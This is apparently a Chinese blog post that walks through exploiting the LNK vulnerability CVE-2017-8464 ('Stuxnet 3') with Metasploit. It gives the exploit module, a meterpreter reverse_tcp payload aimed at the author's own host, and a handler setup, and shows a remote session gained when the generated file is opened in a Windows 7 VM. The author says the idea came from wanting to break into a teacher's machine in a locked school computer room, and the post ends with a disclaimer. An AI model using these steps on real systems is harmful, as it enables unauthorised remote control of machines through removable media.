震网三代利用

笔者在最近想了个问题,学校机房关闭进不去,然后教师机子无ip如何黑入,而且不在同一个网段下面,如何入侵呢,于是看到了一篇关于隔离网络攻击的文章。想到了一年前一个漏洞,于是测试开始。

首先我们来了解一下“震网三代”

它可以利用移动介质,受害者只要开启了自动播放或者点击了漏洞触发就会使系统触发漏洞。

环境:

            ubuntu16.04

            vmware14  and win7 (x64)

            msf

首先我们开一下msf然后搜索一下cve编号

use  use exploit/windows/fileformat/cve_2017_8464_lnk_rce

然后我们需要一些参数。

set payload windows/meterpreter/reverse_tcp

set lhost (自己ip)

exploit

不建议ubuntu下非root账户生成此exp(会发现移动不了文件夹而导致浪费时间。)

如果你不确定U盘是哪个盘符,这些保存下来也不是坏事。

ubuntu建议非root下运行msf并生成该漏洞所需exp进行测试

生成所需的exp后,终端下移动文件夹到可见目录(.msf4是隐藏目录)

然后移动到虚拟机里面。

FlashPlayerCPLApp.cpi才是我们关注的地方。

我们切换到handler模块进行端口监听。

use exploit/multi/handler

设置完自己的ip和payload后我们run

在虚拟机上双击打开cpi后我们会获得一个meterpreter会话。


测试到此结束

请勿将技术利用在非法的用途上。

出了事情本人一概不负责。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值